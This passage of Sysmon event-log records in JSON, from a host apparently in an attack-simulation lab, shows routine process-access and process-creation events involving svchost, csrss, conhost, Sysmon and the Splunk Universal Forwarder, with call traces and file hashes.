C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1893,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.240\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106D-5F25-0000-0010A2C80300}\r\nTargetProcessId: 2624\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.240","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106D-5F25-0000-0010A2C80300}","TargetProcessId":"2624","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1894,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.474\r\nSourceProcessGUID: {E2A3D6B1-106D-5F25-0000-0010A2C80300}\r\nSourceProcessId: 2624\r\nSourceThreadId: 2304\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.474","SourceProcessGUID":"{E2A3D6B1-106D-5F25-0000-0010A2C80300}","SourceProcessId":"2624","SourceThreadId":"2304","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1895,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.504\r\nProcessGuid: {E2A3D6B1-106D-5F25-0000-00106CCB0300}\r\nProcessId: 4088\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" check-license\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-106D-5F25-0000-001067C70300}\r\nParentProcessId: 3896\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.504","ProcessGuid":"{E2A3D6B1-106D-5F25-0000-00106CCB0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" check-license","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-106D-5F25-0000-001067C70300}","ParentProcessId":"3896","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1896,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.490\r\nSourceProcessGUID: {E2A3D6B1-106D-5F25-0000-001067C70300}\r\nSourceProcessId: 3896\r\nSourceThreadId: 3920\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-106D-5F25-0000-00106CCB0300}\r\nTargetProcessId: 4088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+64ab|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1807c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.490","SourceProcessGUID":"{E2A3D6B1-106D-5F25-0000-001067C70300}","SourceProcessId":"3896","SourceThreadId":"3920","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-106D-5F25-0000-00106CCB0300}","TargetProcessId":"4088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+64ab|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1807c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1897,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.490\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106D-5F25-0000-00106CCB0300}\r\nTargetProcessId: 4088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.490","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106D-5F25-0000-00106CCB0300}","TargetProcessId":"4088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1898,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.505\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.505","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1899,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.505\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.505","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1900,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.505\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.505","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1901,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.505\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 